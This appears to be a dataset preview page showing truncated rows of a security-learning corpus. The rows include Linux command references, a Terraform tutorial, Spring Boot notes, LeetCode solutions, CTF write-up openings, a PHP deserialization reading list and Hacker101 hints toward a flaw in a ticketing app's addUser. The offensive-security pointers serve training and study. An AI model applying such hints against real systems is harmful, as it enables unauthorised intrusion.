<center><h1>Terraform 初体验</h1></center>
---
在使用 Terraform 之前,需要先在对应的云厂商控制台上生成一个 Access Key,这里以在 AWS 上创建一个 S3 服务为例。
首先新建一个文件夹,例如 demo 文件夹,接着在里面创建一个 s3demo.tf 文件,文件内容如下:
```json
provider "aws" {
region = "us-west-1"
access_key = "your-access-key"
secret_key = "your-secret-key"
... | sec-knowleage |
# 配置文件
---
Spring Boot 针对我们常用的开发场景提供了一系列自动化配置来减少原本复杂而又几乎很少改动的模板化配置内容。但是,我们还是需要去了解如何在 Spring Boot 中修改这些自动化的配置内容,以应对一些特殊的场景需求,比如:我们在同一台主机上需要启动多个基于 Spring Boot 的 web 应用,若我们不为每个应用指定特别的端口号,那么默认的 8080 端口必将导致冲突。
## 配置基础
src/main/resources 目录是 Spring Boot 的配置目录,所以我们要为应用创建配置个性化配置时,就是在该目录之下。
Spring Boot 的默认配置文件位置为: src/main/reso... | sec-knowleage |
## Keep Calm and CTF (forensics, 100p, 1064 solves)
`My friend sends me pictures before every ctf. He told me this one was special.
Note: this flag doesn't follow the "flag{}" format`

### PL Version
`for ENG version scroll down`
Pierwszą rzeczą jaką robimy w takich sytuacjach jest przejrzenie hexdumpu... | sec-knowleage |
## Impossible Game (Misc, 300p)
Imposible Game http://ctf.sharif.edu:38455/chal/img/ImpossibleGame.html
Download server.py
###ENG
[PL](#pl-version)
We were given source code of server and had to play a game with it to get the flag. Reading the source code immediately
reminded me an old riddle, available
[here]... | sec-knowleage |
.IX Title "lilybbs-linux入门以及精华区导读"
.TH "lilybbs faq" 7 "2004-05-01" "lilybbs-linux入门以及精华区导读"
.SH NAME
lilybbs-faq \- linux入门以及百合 Linux 版精华区导读
.SH "QUESTIONS 问题与解答"
.SS "不需要任何命令的简单介绍"
.TP
历史
.
(APUE 提到了1990年之前的unix历史,还有各种标准 ANSI ISO IEEE posix xpg3....
但是linux 和 BSD 尤其是freebsd 在其后才大行其道)
unix 的历史与 c 是紧密相关的,无论是产生发展还是后来的标准... | sec-knowleage |
gpm
===
提供文字模式下的滑鼠事件处理
## 补充说明
**gpm命令** 是Linux的虚拟控制台下的鼠标服务器,用于在虚拟控制台下实现鼠标复制和粘贴文本的功能。
### 语法
```shell
gpm(选项)
```
### 选项
```shell
-a:设置加速值;
-b:设置波特率;
-B:设置鼠标按键次序;
-m:指定鼠标设备文件;
-t:设置鼠标类型。
``` | sec-knowleage |
# Tic Tac Toe (Web/misc)
A bit of a WTF challenge.
You can play Tic Tac Toe against a computer player, but since he starts and plays well, you can't win.
To get the flag you need to win 100 times in a row.
There was a ton of obfuscated JS, and fortunately we were too lazy to analyse it, because it turned out to be usel... | sec-knowleage |
apt-sortpkgs
===
Debian Linux下对软件包索引文件进行排序的工具
## 补充说明
**apt-sortpkgs命令** 是Debian Linux下对软件包索引文件进行排序的简单工具。
### 语法
```shell
apt-sortpkgs(选项)(参数)
```
### 选项
```shell
-s:使用源索引字段排序;
-h:显示帮助信息。
```
### 参数
文件:指定要排序的包含debian包信息的索引文件。 | sec-knowleage |
import re
import socket
from time import sleep
import bintrees
class Node:
def __init__(self, data=None):
self.left = None
self.right = None
self.data = data
def insert(self, data):
if self.data:
if data <= self.data:
if self.left is None:
... | sec-knowleage |
# Leetcode 题解 - 贪心思想
<!-- GFM-TOC -->
* [Leetcode 题解 - 贪心思想](#leetcode-题解---贪心思想)
* [1. 分配饼干](#1-分配饼干)
* [2. 不重叠的区间个数](#2-不重叠的区间个数)
* [3. 投飞镖刺破气球](#3-投飞镖刺破气球)
* [4. 根据身高和序号重组队列](#4-根据身高和序号重组队列)
* [5. 买卖股票最大的收益](#5-买卖股票最大的收益)
* [6. 买卖股票的最大收益 II](#6-买卖股票的最大收益-ii)
* [7. 种植花朵](#7-种植花朵)
* [8.... | sec-knowleage |
# USB取证
<p align="center">
<img src="../../../../assets/img/banner/USB取证.jpg" width="90%">
</p>
---
## 免责声明
`本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.`
---
**相关文章**
- [USB - CTF Wiki](https://ctf-wiki.github.io/ctf-wiki/misc/traffic/protocols/USB-zh/)
- [USB流量取证分析](https://blog.csdn.net/qq_43431158/article... | sec-knowleage |
# 41.2 字符流中第一个不重复的字符
## 题目描述
[牛客网](https://www.nowcoder.com/practice/00de97733b8e4f97a3fb5c680ee10720?tpId=13&tqId=11207&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github)
## 题目描述
请实现一个函数用来找出字符流中第一个只出现一次的字符。例如,当从字符流中只读出前两个字符 "go" 时,第一个只出现一次的字符是 "g"。当从该字符流中读出前六个字符“google" 时... | sec-knowleage |
# Web
一个 Web 项目的整个开发流程

- UI(user-interface)也可以叫UI设计师
- 前端(front-end)也可以叫前台
- 后端(back-end)也可叫后台
### 前端代码运行环境是什么呢?
对于我们 Web 开发者来说,就是浏览器。注意,浏览器是安装在用户自己的机器上的。也就是说前端代码运行在我们自己的笔记本或者 ipad 上,如果前端代码写的烂,那么考验的是我们自己设备的内存大小。
### 后端代码运行环境是?
是一个放在人家机房... | sec-knowleage |
# PHP反序列化
---
**相关文章 & Source & Reference**
- [Web安全 | PHP反序列化入门这一篇就够了](https://mp.weixin.qq.com/s/HvyRjbLVPaMg7DBfdYmdJw)
- [php反序列化练习题](https://www.cnblogs.com/th0r/p/14152102.html)
- [php反序列化知识点总结](https://www.cnblogs.com/th0r/p/14071894.html)
**相关工具**
- [php 在线反序列化工具](https://www.w3cschool.cn/tools/index?name=unser... | sec-knowleage |
groups
===
打印指定用户所在组的名称。
## 概要
```shell
groups [OPTION]... [username]...
```
## 主要用途
- 打印指定用户所在组的名称。
## 选项
```shell
--help 显示帮助信息并退出。
--version 显示版本信息并退出。
```
## 参数
username(可选):可以是一到多个,不提供时默认为当前用户。
## 返回值
返回0表示成功,返回非0值表示失败。
## 例子
显示linux用户所属的组
```shell
[root@localhost ~]# groups linux
linux : linux adm dialou... | sec-knowleage |
ifcfg
===
置Linux中的网络接口参数
## 补充说明
**ifcfg命令** 是一个Bash脚本程序,用来设置Linux中的网络接口参数。
### 语法
```shell
ifcfg(参数)
```
### 参数
```shell
网络接口:指定要操作的网络接口;
add/del:添加或删除网络接口上的地址;
ip地址:指定IP地址和子网掩码;
Stop:停用指定的网络接口的IP地址。
``` | sec-knowleage |
objdump
===
显示二进制文件信息
## 补充说明
**objdump命令** 是用查看目标文件或者可执行的目标文件的构成的gcc工具。
### 选项
```shell
-a --archive-headers
# 显示档案库的成员信息,类似ls -l将lib*.a的信息列出。
-b bfdname --target=bfdname
# 指定目标码格式。这不是必须的,objdump能自动识别许多格式,比如:
objdump -b oasys -m vax -h fu.o
# 显示fu.o的头部摘要信息,明确指出该文件是Vax系统下用Oasys编译器生成的目标文件。objdump -i将给出这里可以指定的目标码格式... | sec-knowleage |
# Ticketastic: Live Instance
## [Flag0](./flag0) -- Found
- This level and the Ticketastic demo instance are running the same code
- Take a look at addUser on the demo instance
- What is missing?
- Humans might read these tickets and interact with them
- Links in tickets could be interesting
## [Flag1](./flag1) -- Foun... | sec-knowleage |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.